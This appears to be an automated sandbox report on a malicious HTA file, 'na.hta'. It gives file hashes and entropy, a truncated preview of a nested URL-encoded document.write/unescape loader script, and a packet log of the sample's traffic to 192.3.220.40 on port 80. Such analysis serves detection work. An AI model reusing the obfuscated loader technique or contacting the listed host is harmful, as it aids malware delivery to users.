.d.i.a.l.e.c.t. .=. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . .

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
Entropy (8bit):	2.548131261547014
TrID:	HTML Application (8008/1) 100.00%
File name:	na.hta
File size:	120'801 bytes
MD5:	02db2924d9d28415909466fd83d98bfb
SHA1:	131f37687d5f92227dbf8db85537d8d588ba4c67
SHA256:	63460bd959db60a47de9dfbc64c58abd983af187b29d7732987928c56a83a2e1
SHA512:	7b7bec8c6f697b048d87e2af22e704caf7a2c05fdb1331e99d13d5baf0f5c625cf574d16c596d2dbb000b829bdb752437801c8bb833ed7e62dd1ae3f4c14d9f5
SSDEEP:	96:Ea+M7+XoPsV9oPpF/4Ow5qouNREOX8MlV5BYoPItl8AT:Ea+Q+XoPsPoPX/4J54E3cqoPi9T
TLSH:	5BC39EA5EA3848DCBBDD5DA3BEFC7BACB558170F5B0A1EA047073449CD1134E648182E
File Content Preview:	<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatibl

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 10:55:06.012134075 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.017117977 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.017333984 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.017443895 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.022300959 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.522108078 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.522166014 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.522216082 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.522233963 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.522267103 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.522300959 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.522305965 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.522305965 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.522331953 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.522353888 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.522353888 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.522382021 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.522413969 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.522447109 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.522469997 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.522469997 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.522469997 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.522480011 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.522602081 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.522602081 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.527334929 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.527410984 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.527445078 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.527446985 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.527460098 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.527504921 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.617634058 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.617691994 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.617724895 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.617731094 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.617759943 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.617795944 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.617810011 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.617810011 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.617810011 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.617882013 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.617914915 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.617968082 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.618001938 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.618024111 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.618024111 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.618037939 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.618076086 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.618130922 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.618130922 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.618130922 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.618840933 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.618916988 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.618977070 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.619010925 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.619044065 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.619065046 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.619065046 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.619065046 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.619065046 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.619187117 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.619740963 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.619796038 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.619815111 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.619848967 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.619863033 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.619884968 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.619920015 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.619925022 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.619954109 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.619986057 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.620635033 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.620687008 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.620722055 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.620762110 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.620762110 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.620845079 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.622668028 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.622772932 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.707848072 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.707894087 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.707950115 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.707950115 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.707956076 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.707992077 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.708026886 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.708059072 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.708076000 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.708076000 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.708076000 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.708097935 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.708121061 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.708163977 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.708168030 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.708200932 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.708234072 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.708239079 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.708267927 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.708364010 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.708364010 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.708364010 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710484982 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.710517883 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.710556984 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.710592985 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710592985 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710592985 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710611105 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.710661888 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.710694075 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.710741043 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710741043 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710741997 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710742950 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.710776091 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.710824013 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.710855961 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.710890055 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.710892916 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710892916 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710892916 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710892916 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710922003 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.710952997 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710966110 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.710971117 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711004019 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711036921 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711067915 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711078882 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.711078882 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.711078882 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.711102962 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711139917 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.711184025 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.711556911 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711606026 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711618900 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.711638927 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711705923 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.711705923 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.711795092 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711827993 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711899996 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711934090 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711950064 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.711950064 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.711950064 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.711980104 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.711993933 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.712032080 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.712038040 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.712064028 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.712094069 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.712114096 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.712132931 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.712146997 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.712162018 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.712193012 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.712203026 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.712292910 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.800932884 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.800987005 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801019907 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801048994 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801048994 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801065922 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801084995 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801116943 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801167011 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801198959 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801215887 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801215887 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801215887 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801230907 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801265955 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801275015 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801279068 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801327944 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801336050 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801361084 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801384926 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801394939 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801428080 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801440001 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801440001 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801460028 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801491976 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801503897 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801503897 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801526070 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.801528931 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.801702976 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.802095890 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.802128077 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.802160025 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.802165031 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.802191973 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.802217007 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.802217007 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.802340031 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803440094 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803471088 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803519964 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803524017 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803524017 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803553104 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803566933 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803586006 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803632021 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803638935 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803653955 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803669930 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803685904 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803719044 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803749084 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803749084 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803749084 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803767920 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803769112 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803812027 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803843975 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803847075 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803895950 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803927898 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803934097 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803934097 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803962946 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.803968906 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.803968906 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.804097891 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.804152966 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.804187059 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.804236889 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.804285049 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.804316044 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.804316044 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.804316044 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.804317951 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.804368019 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.804404974 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.804436922 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.804438114 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.804438114 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.804438114 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.804460049 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.804471016 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.804486036 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.804502010 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.804541111 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.804569006 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.804924965 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.804986000 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805020094 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805042982 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.805042982 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.805068016 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.805068970 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805130005 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805160999 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.805161953 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805176020 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.805255890 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.805274010 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805325031 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805357933 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805389881 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805398941 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.805398941 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.805408955 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.805421114 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805455923 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805459023 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.805469990 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.805551052 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.805901051 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805933952 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805964947 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.805969000 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.806000948 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.806011915 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.846159935 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.846194983 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.846230984 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.846251011 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.846640110 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.893711090 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.893764019 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.893798113 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.893830061 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.893866062 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.893879890 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.893879890 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.893879890 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.893917084 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.893949032 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.893949032 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.893950939 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.893981934 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.893984079 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894030094 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894047022 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894059896 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894128084 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894136906 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894169092 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894210100 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894265890 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894273043 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894316912 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894357920 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894367933 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894402027 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894440889 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894440889 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894452095 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894483089 CEST	49704	80	192.168.2.5	192.3.220.40
